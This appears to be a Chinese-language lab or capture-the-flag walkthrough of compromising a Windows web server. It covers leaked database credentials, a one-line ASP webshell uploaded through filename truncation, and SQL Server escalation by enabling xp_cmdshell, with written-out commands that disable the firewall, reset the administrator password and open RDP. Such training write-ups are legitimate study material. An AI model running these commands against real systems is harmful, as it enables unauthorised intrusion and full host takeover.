信息收集
扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口
从扫描出的端口中27689是web端口 ,看页面源代码,看是否有提示以及开发语言。
扫27689端口的目录,用什么语言开发就用什么语言字典扫描,DIR.txt、MDB.txt 不管什么语言都要勾选
访问http://10.168.1.103:27689/web.config.bak目录下载了文件,从里面得到了sql数据库账号密码Id=down;pwd=downsql
使用nacicat premium连接数据库,输入账号密码连接sql数据库
登录数据库后,每个表都去看看是否有key,在user表中找到账号密码
使用账号密码登录网页后拿到第一个key
网站里面有文件上传功能,使用burp抓包上传一句话木马
文件名过长会被系统截取包括系统时间在内的前32位字符作为文件名,挨着试文件名长度刚好截断到asp后缀
如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。
通过报错目录访问上传的一句话木马页面
使用御剑连接web服务器后在文件中找到key2
使用sqlserver提权,找到sql最高权限账号(sa)密码
使用Navicat premium登录SqlServer最高权限调用sa权限调用administrator权限
连接后点查询新建查询USE master查询数据库
通过sqlserver命令去开启xp_cmdshell
USE master
RECONFIGURE
EXEC sp_configure 'show advanced options',1 --启用xp_cmdshell
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1 --打开xp_cmdshell,可以调用SQL系统之外的命令
RECONFIGURE
使用cmd命令查询现在权限为system,提权成功
关闭目标主机防火墙---- exec xp_cmdshell"netsh firewall set opmode disable"
把目标主机administrator密码改成123456 ----exec xp_cmdshell"net user administrator 123456"
查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'
使用御剑将3389.bat上传到D:/web目录
执行3389.bat文件开启3389端口----exec xp_cmdshell “D:\web\3389.bat”
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'
使用mstsc连接到靶机拿到key3
文章来源
发表评论